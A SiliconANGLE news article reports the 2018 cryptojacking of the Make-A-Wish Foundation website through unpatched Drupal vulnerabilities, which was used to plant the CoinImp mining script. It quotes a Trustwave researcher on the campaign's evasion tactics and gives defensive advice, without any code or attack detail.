SECURITY
SECURITY
SECURITY
Make-A-Wish website cryptojacked with increasingly popular CoinImp script
Proving that some hackers have no morals whatsoever, the website of the Make-A-Wish Foundation has been “cryptojacked” to install the increasingly popular cryptomining script.
Discovered by Simon Kenin, a security researcher at Trustwave SpiderLabs, and publicized today, the hack involved unknown hackers accessing the Make-A-Wish website through a Drupal vulnerability dubbed Drupalgeddon 2.
A Drupalgeddon 2 attack takes advantage of Drupal installations that have not patched CVE-2018-7600 and CVE-2018-7602, two vulnerabilities that were first targeted by cryptomining hackers in May.
Although the attack was notable for its target, prompting The Register to ask, “Do they accept Monero in hell?” the more interesting part of the attack was the deployment of an increasingly popular form of cryptomining script.
Called CoinImp, the coin mining script first became available in December and works in a similar fashion to market leader Coinhive. Users insert javascript code on a website and visitors to the site have their computer hijacked to mine for the Monero or another cryptocurrency called webchain.network while they are visiting.
CoinImp takes a 1 percent fee on mined cryptocurrency and also offers a referral program that allows script users to sign up others to get a percentage of what their referrals mine.
“What’s interesting about this particular campaign is that it uses different techniques to avoid static detections,” Kenin wrote. “It starts with changing the domain name that hosts the JavaScript miner, which is itself obfuscated…. The WebSocket proxy also uses different domains and IPs which make blacklist solutions obsolete.”
The ability for the script to be obfuscated by traditional blacklist solutions, such as antivirus software and similar products, may result in more attacks using the script occurring.
“The CoinIMP cryptominer is growing rapidly in popularity and the combination of a well-trafficked charity site paired with the season of giving made this the perfect target for a large-scale cyberattack,” a spokesperson for Trustwave told SiliconANGLE.
Kenin noted that enterprises and other website owners should deploy endpoint protection capable of detecting cryptominers, monitor changes to their website and audit those changes to make sure they were authorized and always make sure that their website software is up-to-date with patches.
Image: CoinImp
A message from John Furrier, co-founder of SiliconANGLE:
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
